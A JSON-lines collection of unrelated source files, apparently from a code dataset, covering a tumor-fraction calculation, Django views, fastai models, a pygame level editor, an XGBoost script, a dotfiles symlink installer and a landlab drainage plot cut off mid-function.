+{"seq_id": "434905684", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 18 11:32:38 2020\r\n\r\n@author: amurtha\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport scipy.stats as stats\r\nimport numpy as np\r\n\r\npd.set_option(\"display.max_columns\", None)\r\n\r\ndef get_adj_maf(maf, depth):\r\n alt = maf*depth\r\n for p in np.arange(0,1,0.005):\r\n dist = stats.binom(depth, p)\r\n if dist.cdf(alt) < 0.95:\r\n maf = p; break;\r\n return maf;\r\n\r\n# =============================================================================\r\n# Create mutation table\r\n# =============================================================================\r\n\r\nsample_id = ['17-095-3rd-cfDNA'] * 5\r\nchrom = ['chr5', 'chr8', 'chr11', 'chr17', 'chr17']\r\ngene = ['TERT', 'FGFR1', 'ATM', 'TP53', 'TP53']\r\naf = [0.032, 0.074, 0.053, 0.07, 0.072] #allele frequency is equal to mutant reads / total reads\r\nread_depth = [312, 1519, 1351, 1262, 1283]\r\neffect = ['Upstream',\r\n 'Missense',\r\n 'Missense',\r\n 'Synonymous',\r\n 'Missense']\r\n\r\nmuts = pd.DataFrame({'Sample_ID':sample_id,'CHROM':chrom,'GENE':gene,'EFFECT':effect,'Allele_frequency':af, 'Read_depth':read_depth})\r\n\r\ndel sample_id, chrom,gene,af,read_depth,effect\r\n\r\n# =============================================================================\r\n# Create copy number table\r\n# =============================================================================\r\n\r\nsample_id = ['17-095-3rd-cfDNA'] * 4\r\ngene = ['TERT', 'FGFR1', 'ATM', 'TP53']\r\ncopy_num = [0, 0, 0, 0]\r\nlr = [0.01, 0.04, -0.06, -0.03]\r\n\r\ncn = pd.DataFrame({'Sample_ID':sample_id,'GENE':gene,'Copy_num':copy_num,'Log_ratio':lr,})\r\n\r\ndel sample_id,gene,lr,copy_num\r\n\r\n# =============================================================================\r\n# Tumor fraction estimation\r\n# =============================================================================\r\n\r\nprint('Sample tumor fraction (TF) calculation: 17-095-3rd-cfDNA')\r\n\r\nprint('\\nSample mutations:')\r\nprint(muts.head())\r\n\r\nprint('\\nCheck log-ratio of mutated genes. Do not use mutations on genes with log-ratio > 0.3. In this case, no genes amplified.')\r\nprint(cn)\r\n\r\nprint('\\nCheck depth. Do not use mutation with depth < 30 reads. In this case, all depths are above 30.')\r\nprint(muts[['GENE','Read_depth']])\r\n\r\nprint('\\nCheck for mutations on allosomes. Mutations on allosomes will not be considered when calculating tumor fraction. In this case, all mutations are on autosomes.')\r\nprint(muts[['GENE','CHROM']])\r\n\r\nprint('\\nAdjust allele frequencies to conservatively calculate the VAF if the observed VAF is a 95% quantile outlier.')\r\nmuts['Adj_allele_frequency'] = muts.apply(lambda row: get_adj_maf(row['Allele_frequency'], row['Read_depth']), axis = 1)\r\nprint(muts[['GENE','Allele_frequency','Adj_allele_frequency']])\r\n\r\nprint('\\nCalculate tumor fraction (TF) for every mutation using TF = 2 / (1 + 1 / AF), where AF is the adjusted allele frequency.')\r\nmuts['Tumor fraction'] = 2 / (1 + 1/muts['Adj_allele_frequency'])\r\nprint(muts[['GENE','Allele_frequency','Adj_allele_frequency','Tumor fraction']])\r\n\r\nprint('\\nThe tumor fraction of the sample is the highest calculated. 
Mutation must not have low depth, an amplification, or be located on an allosome.')\r\nprint('\\nIn this case, the tumor fraction of 17-095-3rd-cfDNA is 12.2%, based on the FGFR1 and TP53 mutations.')", "sub_path": "Python/TumorFraction_walkthrough.py", "file_name": "TumorFraction_walkthrough.py", "file_ext": "py", "file_size_in_byte": 3287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.set_option", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.stats.binom", "line_number": 17, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 17, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}]}
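A worked instance of the adjustment above for the FGFR1 mutation (AF 0.074 at depth 1519, so about 112 mutant reads), assuming scipy is available; the 0.005 grid step matches get_adj_maf:

import scipy.stats as stats

depth = 1519
alt = 0.074 * depth          # ~112.4 mutant reads
print(stats.binom(depth, 0.060).cdf(alt))  # ~0.99: >= 0.95, keep scanning
print(stats.binom(depth, 0.065).cdf(alt))  # ~0.92: < 0.95, stop here
# Adjusted AF = 0.065, so TF = 2 / (1 + 1 / 0.065) ~= 0.122 -- the 12.2%
# reported for the sample.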
+{"seq_id": "263439170", "text": "from django.conf.urls import patterns, url\nfrom django.conf import settings\nfrom django.conf.urls.static import static \n\nfrom . import views\n\napp_name = 'position_papers'\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^submission/$', views.submission, name='submission'),\n url(r'^user_submission/$', views.user_submission, name=\"user_submission\"),\n url(r'^success/$', views.success, name='success'),\n url(r'^submit/$', views.submit, name='submit'),\n url(r'^staff/$', views.staff, name='staff'),\n url(r'^committee/$', views.committee, name='committee'),\n url(r'^committee_select/$', views.committee_select, name='committee_select'),\n url(r'^committee_papers/$', views.committee_papers, name='committee_papers'),\n url(r'^position_dropdown/$', views.position_dropdown, name='position_dropdown'),\n url(r'^get_json_positions/$', views.get_json_positions, name='get_json_positions'),\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "sub_path": "position_papers/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1004, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "261378515", "text": "from fastai.basics import *\nfrom fastai.callbacks.hooks import dummy_eval\nfrom ..layers import *\n\n__all__ = ['Simple3d', 'ClassifierHead', 'Conv1dClassifierHead', 'LstmClassifierHead']\n\ndef conv_pool(ni, nf, ks=3, stride=1, do_pooling=False, **kwargs):\n pool = do_pooling and any([e>1 for e in listify(stride)])\n conv = conv_layer3d(ni, nf, stride=1 if pool else stride, **kwargs)\n if pool: return nn.Sequential(conv, nn.MaxPool3d(stride))\n else : return conv\n\nclass Simple3d(nn.Sequential):\n def __init__(self, vol_size, num_layers, ni=1, nf=16, hidden=200, num_classes=2, drop_conv=0, drop_out=0,\n separable_convs=False, concat_pool=False, self_attention=False, do_pooling=True):\n layers = [conv_layer3d(ni, nf, ks=3, stride=[2 if e > max(vol_size)//2 else 1 for e in vol_size])]\n x = dummy_eval(layers[0], vol_size).detach()\n \n for i in range(num_layers-1):\n dims = x.shape[-3:]\n strides = 1 if i==num_layers-2 else [2 if e > max(dims)//2 else 1 for e in dims]\n sa = self_attention and (i==num_layers-4)\n layers.append(conv_pool(nf, nf*2, stride=strides, do_pooling=do_pooling, separable=separable_convs, self_attention=sa))\n nf *= 2\n x = layers[-1].eval()(x)\n \n if concat_pool:\n pool = AdaptiveConcatPool3d()\n nf *= 2\n else:\n pool = nn.AdaptiveMaxPool3d(1)\n \n layers += [pool, Flatten(), ClassifierHead([nf,hidden,num_classes],[drop_conv,drop_out])]\n super().__init__(*layers)\n\nclass ClassifierHead(nn.Sequential):\n def __init__(self, layers, drops):\n mod_layers = []\n activs = [nn.ReLU(inplace=True)] * (len(layers) - 2) + [None]\n for n_in,n_out,p,actn in zip(layers[:-1],layers[1:], drops, activs):\n mod_layers += bn_drop_lin(n_in, n_out, p=p, actn=actn)\n super().__init__(*mod_layers)\n\nclass Conv1dClassifierHead(nn.Sequential):\n def __init__(self, features_in, conv_layers, layers, drops, ks=5, stride=3):\n mod_layers = []\n for i, (n_in,n_out) in enumerate(zip([features_in]+conv_layers[:-1], conv_layers)):\n mod_layers += [nn.BatchNorm1d(n_in),\n nn.Conv1d(n_in, n_out, kernel_size=ks, stride=stride), nn.ReLU(inplace=True)]\n if i == len(conv_layers)-1: mod_layers += [nn.AdaptiveMaxPool1d(1), Flatten()]\n \n mod_layers += [ClassifierHead([n_out]+layers, drops)]\n super().__init__(*mod_layers)\n \nclass LstmClassifierHead(nn.Module):\n def __init__(self, features_in, nf_rnn, layers, drops, bidirectional=False, pool=False):\n super().__init__()\n self.ndir = 2 if bidirectional else 1\n self.rnn = nn.LSTM(features_in, nf_rnn, 1, bidirectional=bidirectional).cuda()\n self.do_pool = pool\n nf = nf_rnn\n if bidirectional: nf *= 2\n if pool: nf *= 3\n self.layers = ClassifierHead([nf]+layers, drops)\n \n def pool(self, x, is_max):\n f = F.adaptive_max_pool1d if is_max else F.adaptive_avg_pool1d\n return f(x.permute(1,2,0), (1,)).squeeze()\n \n def forward(self, x):\n out, *_ = self.rnn(x.transpose(0,1))\n if self.do_pool:\n avgpool = self.pool(out, False)\n mxpool = self.pool(out, True)\n out = torch.cat([out[-1], mxpool, avgpool], 1)\n else:\n out = out[-1]\n \n return self.layers(out)\n", "sub_path": "fastai_scans/models/classification.py", "file_name": "classification.py", "file_ext": "py", "file_size_in_byte": 3491, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "fastai.callbacks.hooks.dummy_eval", "line_number": 17, "usage_type": "call"}, {"api_name": "layers.append", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "297331132", "text": "from couchdb_layer.mcm_database import database\nfrom tools.locker import locker\nfrom tools.countdown_cache import CountdownCache\n\n__cache = CountdownCache()\n__db = database('settings')\n\ndef get(label):\n with locker.lock(label):\n cache_key = 'settings_' + label\n cached_value = __cache.get(cache_key)\n if cached_value is not None:\n return cached_value\n setting = __db.get(label)\n __cache.set(cache_key, setting)\n return setting\n\ndef get_value(label):\n return get(label)['value']\n\ndef get_notes(label):\n return get(label)['notes']\n\ndef add(label, setting):\n with locker.lock(label):\n result = __db.save(setting)\n if result:\n cache_key = 'settings_' + label\n __cache.set(cache_key, setting)\n return result\n\ndef set_value(label, value):\n with locker.lock(label):\n setting = get(label)\n setting['value'] = value\n return set(label, setting)\n\ndef set(label, setting):\n with locker.lock(label):\n result = __db.update(setting)\n if result:\n # Maybe it's a better idea to cache the setting immediately instead\n # getting it from database?\n new_value = __db.get(label)\n cache_key = 'settings_' + label\n __cache.set(cache_key, new_value)\n return result\n\ndef cache_size():\n return __cache.get_length(), __cache.get_size()\n\ndef clear_cache():\n size = cache_size()\n __cache.clear()\n return size\n", "sub_path": "mcm/tools/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 1502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tools.countdown_cache.CountdownCache", "line_number": 5, "usage_type": "call"}, {"api_name": "couchdb_layer.mcm_database.database", "line_number": 6, "usage_type": "call"}, {"api_name": "tools.locker.locker.lock", "line_number": 9, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 9, "usage_type": "name"}, {"api_name": "tools.locker.locker.lock", "line_number": 25, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 25, "usage_type": "name"}, {"api_name": "tools.locker.locker.lock", "line_number": 33, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 33, "usage_type": "name"}, {"api_name": "tools.locker.locker.lock", "line_number": 39, "usage_type": "call"}, {"api_name": "tools.locker.locker", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "14753908", "text": "import pickle\n\nimport ezTypes as ez\nimport pygame\n\nLevelWidth = int(input('Please enter the width of the level: '))\nLevelHeight = int(input('Please enter the height of the level: '))\n\n# Create the window\nscreen = pygame.display.set_mode([LevelWidth * 20, (LevelHeight * 20) + 20])\npygame.display.set_caption('Level Creator')\n\n\ndef savelevel(data: any, savename: str) -> None:\n \"\"\"Saves the created level to the supplied filename.\"\"\"\n with open(savename, 'wb') as file:\n pickle.dump(data, file)\n\n\ndef drawsq(color: str, pos: tuple) -> None:\n \"\"\"Draws a square in the given position with the specified color.\"\"\"\n pygame.draw.rect(screen, color, pygame.Rect(pos[0], pos[1], 20, 20))\n\n\ngrid = [['' for i in range(LevelWidth)] for j in range(LevelHeight)]\ncolorGrid = [['' for i in range(LevelWidth)] for j in range(LevelHeight)]\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit(0)\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Place or remove tiles on the map\n if 0 < event.pos[0] < LevelWidth * 20 and 20 < event.pos[1] < ((LevelHeight + 1) * 20):\n if event.button in [1, 3]:\n grid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.select if event.button == 1 else ''\n colorGrid[(event.pos[1] // 20) - 1][\n event.pos[0] // 20] = ez.colorSelect if event.button == 1 else ez.AIR\n # Tile selection menu\n if 0 < event.pos[0] < LevelWidth * 20 and 0 < event.pos[1] < 20 and event.button == 1:\n xUnit = event.pos[0] // 20\n try:\n ez.select = ez.types[xUnit]\n ez.colorSelect = ez.colorTypes[xUnit]\n except IndexError:\n pass\n # Export button\n if (LevelWidth - 1) * 20 < event.pos[0] < LevelWidth * 20 and 0 < event.pos[1] < 20 and event.button == 1:\n savelevel(grid, '00001.level')\n print('Saved \"00001.level\"!')\n if event.type == pygame.MOUSEMOTION:\n if 0 < event.pos[0] < LevelWidth * 20 and 0 < event.pos[1] < 20:\n try:\n pygame.display.set_caption(f'Select tile type: {ez.types[event.pos[0] // 20]}')\n except IndexError:\n if event.pos[0] // 20 == LevelWidth - 1:\n pygame.display.set_caption('Export')\n else:\n pygame.display.set_caption('Level Creator')\n else:\n pygame.display.set_caption('Level Creator')\n if event.buttons[0] == 1 or event.buttons[2] == 1:\n grid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.select if event.buttons[0] == 1 else ''\n if event.buttons[0] == 1:\n colorGrid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.colorSelect\n else:\n colorGrid[(event.pos[1] // 20) - 1][event.pos[0] // 20] = ez.AIR\n\n # Draw the map tiles\n for y in range(len(grid)):\n for x in range(len(grid[y])):\n if not grid[y][x] == '':\n drawsq(colorGrid[y][x], (x * 20, (y + 1) * 20))\n\n # Draw the tile selection bar\n for i in range(len(ez.types)):\n drawsq(ez.colorTypes[i], (i * 20, 0))\n\n # Draw the yellow export button\n drawsq((252, 231, 3), ((LevelWidth - 1) * 20, 0))\n\n # Draw the grid\n for x in range(0, (LevelWidth * 20), 20):\n for y in range(20, 20 + (LevelHeight * 20), 20):\n pygame.draw.rect(screen, (255, 255, 255), pygame.Rect(x, y, 20, 20), 1)\n\n # Draw the red bounding box\n pygame.draw.rect(screen, (255, 0, 0), pygame.Rect(0, 20, LevelWidth * 20, LevelHeight * 20), 1)\n\n # Update screen then wipe the buffer for the next frame\n pygame.display.flip()\n screen.fill((0, 0, 0))\n", "sub_path": "tools/LevelCreator/LevelCreator.py", "file_name": "LevelCreator.py", "file_ext": "py", "file_size_in_byte": 3954, "program_lang": "python", "lang": "en", "doc_type": 
"code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "ezTypes.select", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ezTypes.colorSelect", "line_number": 39, "usage_type": "attribute"}, {"api_name": "ezTypes.AIR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "ezTypes.select", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ezTypes.types", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ezTypes.colorSelect", "line_number": 45, "usage_type": "attribute"}, {"api_name": "ezTypes.colorTypes", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 55, "usage_type": "attribute"}, {"api_name": "ezTypes.types", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 62, "usage_type": "attribute"}, {"api_name": "ezTypes.select", "line_number": 64, "usage_type": "attribute"}, {"api_name": "ezTypes.colorSelect", "line_number": 66, "usage_type": "attribute"}, {"api_name": "ezTypes.AIR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "ezTypes.types", "line_number": 77, "usage_type": "attribute"}, {"api_name": "ezTypes.colorTypes", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 92, "usage_type": "attribute"}]}
+{"seq_id": "280513546", "text": "\nfrom xgboost import XGBClassifier\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import StandardScaler\n#from sklearn.model_selection import GridSearchCV \n#from sklearn.decomposition import PCA\n\ntrain_df = pd.read_csv('train.csv')\ntest_df = pd.read_csv('test.csv')\n\nX_train = train_df.drop('target',axis=1)\ny_train = train_df['target']\n\n#pca = PCA(n_components = 2)\n#X_train = pca.fit_transform(X_train)\n\nx_train,x_validation,y_train,y_validation = train_test_split(X_train,y_train,test_size=0.2,random_state=0)\n\nsc = StandardScaler()\nx_train = sc.fit_transform(x_train)\nx_validation = sc.transform(x_validation)\ntest_norm = sc.transform(test_df)\n\nclassifier = XGBClassifier(max_depth = 10, subsample = 1, min_child_weight = 1.5, eta = 0.1, colsample_bytree = 0.5, seed = 42, num_rounds = 1000, silent = 1)\nclassifier.fit(x_train,y_train)\n\n#y_pred = classifier.predict(x_validation)\ny_pred = classifier.predict_proba(test_norm)\ny_pred = y_pred[:,1]\ny_pred = (y_pred > 0.5)\n\nsub=pd.DataFrame()\ntest_id = test_df.id.values\nsub['id'] = test_id\nsub['target'] = y_pred\nsub.to_csv('Xgboost4.csv', index=False)\n\n#y_pred = classifier.predict(x_validation)\n\ncm = confusion_matrix(y_validation,y_pred)\n\nacc = accuracy_score(y_validation, y_pred)\n\n\naccuracies = cross_val_score(estimator = classifier , X = x_train, y = y_train, cv = 10)\naccuracies.mean()\naccuracies.std()\n\nparameters = [{'learning_rate':[0.05,0.08,0.1,]}]\n\ngrid_search = GridSearchCV(estimator= classifier, param_grid = parameters, scoring = 'accuracy', cv = 10, n_jobs = -1)\n\ngrid_search = grid_search.fit(x_train,y_train)\nbest_accuracy = grid_search.best_score_\nbest_parameters = grid_search.best_params_\n", "sub_path": "Xgboost.py", "file_name": "Xgboost.py", "file_ext": "py", "file_size_in_byte": 1909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 25, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "160581354", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\n\nimport orchestrator.utils.cache_utils as cache\nimport orchestrator.utils.airflow_utils as airflow_utils\nimport orchestrator.utils.constants as constants\n\nimport json\n\n\ndef index(request):\n\n commodity = request.GET.get(\"commodity\")\n state = request.GET.get(\"state\")\n region = request.GET.get(\"region\")\n start_date = request.GET.get(\"start_date\")\n end_date = request.GET.get(\"end_date\")\n\n apmc = request.GET.get(\"apmc\")\n news = request.GET.get(\"news\")\n sector = request.GET.get(\"sector\")\n social_media = request.GET.get(\"social_media\")\n politics = request.GET.get(\"politics\")\n nature = request.GET.get(\"nature\")\n global_cues = request.GET.get(\"global_cues\")\n\n print(\"Values Received : \")\n\n print(str(commodity) + str(state) + \" \" + str(region) + \" \" + str(start_date) + \" \" + str(end_date) + \" \" + str(apmc) + \" \"\n + str(news) + \" \" + str(sector) + \" \" + str(social_media) + \" \" + str(politics) + \" \"\n + str(nature) + \" \" + str(global_cues))\n\n configuration = {\n \"meta\" : {\n \"commodity\": commodity,\n \"state\": state,\n \"region\": region,\n \"start_date\": start_date,\n \"end_date\": end_date\n\n },\n \"sources\" : [apmc, news, sector, social_media, politics, nature, global_cues],\n }\n\n cache.set(\"configuration\", json.dumps(configuration))\n\n print(\"From Cache : \" + str(cache.get(\"configuration\")))\n configuration_cached = cache.get(\"configuration\")\n configuration_cached = json.loads(configuration_cached)\n print(configuration_cached[\"sources\"])\n\n airflow_utils.trigger_airflow_dag(constants.DAG_ID)\n\n return HttpResponse(\"
ElasticFlow Configured Successfully
\")\n", "sub_path": "kreate_elasticrun/orchestrator/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1941, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "orchestrator.utils.cache_utils.set", "line_number": 47, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils", "line_number": 47, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils.get", "line_number": 49, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils", "line_number": 49, "usage_type": "name"}, {"api_name": "orchestrator.utils.cache_utils.get", "line_number": 50, "usage_type": "call"}, {"api_name": "orchestrator.utils.cache_utils", "line_number": 50, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "orchestrator.utils.airflow_utils.trigger_airflow_dag", "line_number": 54, "usage_type": "call"}, {"api_name": "orchestrator.utils.airflow_utils", "line_number": 54, "usage_type": "name"}, {"api_name": "orchestrator.utils.constants.DAG_ID", "line_number": 54, "usage_type": "attribute"}, {"api_name": "orchestrator.utils.constants", "line_number": 54, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "1621085", "text": "#!/usr/bin/env python3\n\nimport argparse\nfrom os import remove, symlink\nfrom os.path import abspath, dirname, exists, expanduser, join, normpath\nfrom pathlib import PosixPath\n\nROOT_DIR = dirname(abspath(__file__))\nargs = None\nDRY_RUN_PREFIX = \"(DRY RUN)\"\n\n\ndef create_symlink(src, target):\n if args.dry_run:\n print(DRY_RUN_PREFIX, \"Creating symlink {} to {}\".format(target, src))\n return\n print(\"Creating symlink {} to {}\".format(target, src))\n try:\n remove(target)\n except FileNotFoundError:\n pass\n target_dir = dirname(target)\n if not exists(target_dir):\n PosixPath(target_dir).mkdir(parents=True)\n symlink(src, target)\n\n\ndef install_zsh_config(args):\n target_map = [\n (\"zsh/.zshrc\", \".zshrc\"),\n (\"zsh/.zshrc_aliases\", \".zshrc_aliases\"),\n (\"zsh/.zshrc_ohmyzsh\", \".zshrc_ohmyzsh\"),\n (\"zsh/.zshrc_path\", \".zshrc_path\"),\n (\"zsh/.zshenv\", \".zshenv\"),\n (\"../common/.profile\", \".profile\"),\n (\"../common/.zprofile\", \".zprofile\"),\n (\"../common/zsh/.zshrc_other\", \".zshrc_other\"),\n (\"../common/git/.gitconfig\", \".gitconfig\"),\n (\"../common/git/.gitignore_global\", \".gitignore_global\"),\n (\"ssh/config\", \".ssh/config\"),\n (\"../common/neovim/init.vim\", \".config/nvim/init.vim\"),\n (\"../common/nodenv/version\", \".nodenv/version\"),\n (\"../common/rbenv/version\", \".rbenv/version\"),\n (\"../common/pyenv/version\", \".pyenv/version\"),\n (\"../common/goenv/version\", \".goenv/version\"),\n (\"../common/boto/.boto\", \".boto\"),\n (\"tmux/.tmux.conf\", \".tmux.conf\"),\n (\"vscode/settings.json\", \"Library/Application Support/Code/User/settings.json\"),\n (\n \"../common/vscode/keybindings.json\",\n \"Library/Application Support/Code/User/keybindings.json\",\n ),\n (\"gnupg/gpg-agent.conf\", \".gnupg/gpg-agent.conf\"),\n ]\n for i in target_map:\n src = normpath(join(ROOT_DIR, i[0]))\n target = join(expanduser(\"~\"), i[1])\n create_symlink(src, target)\n\n\ndef run():\n global args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dry-run\", action=\"store_true\")\n args = parser.parse_args()\n install_zsh_config(args)\n\n\nif __name__ == \"__main__\":\n run()\n", "sub_path": "macos/update.py", "file_name": "update.py", "file_ext": "py", "file_size_in_byte": 2287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "pathlib.PosixPath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.symlink", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 57, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "617627212", "text": "#!/usr/bin/env python3n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 23 14:05:21 2017\n\ncreating flow_directions_mfd\n\n@author: katybarnhart\n\"\"\"\n#%%\ndef drainagePlot(mg, receivers=None, proportions=None, surf_cmap='viridis', surface='topographic__elevation'):\n import matplotlib.pylab as plt\n from pylab import show\n from landlab.plot.imshow import imshow_node_grid\n from matplotlib.collections import LineCollection\n import numpy as np\n \n imshow_node_grid(mg, surface, cmap=surf_cmap)\n \n if receivers is None:\n receivers = np.reshape(mg.at_node['flow__receiver_node'],(mg.number_of_nodes,1))\n \n nseg=2000\n tmax=1\n t=np.linspace(0,tmax,nseg)\n nreceievers = int(receivers.size/receivers.shape[0])\n \n propColor=plt.get_cmap('magma')\n \n for i in mg.nodes.flatten():\n for j in range(nreceievers):\n if receivers[i,j]>0:\n x = np.linspace(mg.node_x[i], mg.node_x[receivers[i,j]], nseg)\n y = np.linspace(mg.node_y[i], mg.node_y[receivers[i,j]], nseg)\n \n points = np.array([x, y]).T.reshape(-1, 1, 2)\n segments = np.concatenate([points[:-1], points[1:]], axis=1)\n \n if proportions is not None:\n lu = int(np.floor(proportions[i,j]*256))\n lc = LineCollection(segments, linewidths=1.+10.*t)\n lc.set_color(propColor(lu))\n else:\n lc = LineCollection(segments, \n cmap='magma',\n 